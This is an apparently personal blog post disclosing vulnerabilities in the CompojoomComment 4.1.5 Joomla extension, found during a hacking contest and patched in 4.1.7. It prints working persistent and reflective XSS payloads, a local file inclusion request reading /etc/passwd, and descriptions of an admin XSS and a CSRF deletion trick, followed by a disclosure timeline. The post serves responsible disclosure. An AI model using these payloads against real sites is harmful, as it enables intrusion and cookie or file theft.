Wednesday, 01 September 2010 15:48

Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).

Malformed BBCode Persistent XSS, #1

a[img]b[img]c[/img]d[/img]e
a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e

Malformed BBCode Persistent XSS, #2

[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]

Local File Inclusion

?option=com_comment
&no_html=1
&component=../../../../../../../../../../../../etc/passwd%00
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Reflective XSS

?option=com_comment
&no_html=1
&component=<script>alert(document.cookie);</script>
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Administrator Persistent XSS

Name & Title inputs in comment edit aren't sanitized - a double quote in either field will allow for XSS in admin IF the admin edits that comment...

Comment Deletion CSRF

Embedding the "delete comment" URL in an [img] BBCode would result in comment deletion if an authorized admin loaded the page

Timeline

  • Vulnerabilities Discovered: 4-9 August 2010
  • Vendor Notified: 4-9 August 2010
  • Vendor Response: 4-9 August 2010
  • Update Available: 9 August 2010
  • Disclosure: 1 September 2010
Last Updated on Thursday, 30 September 2010 17:34
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions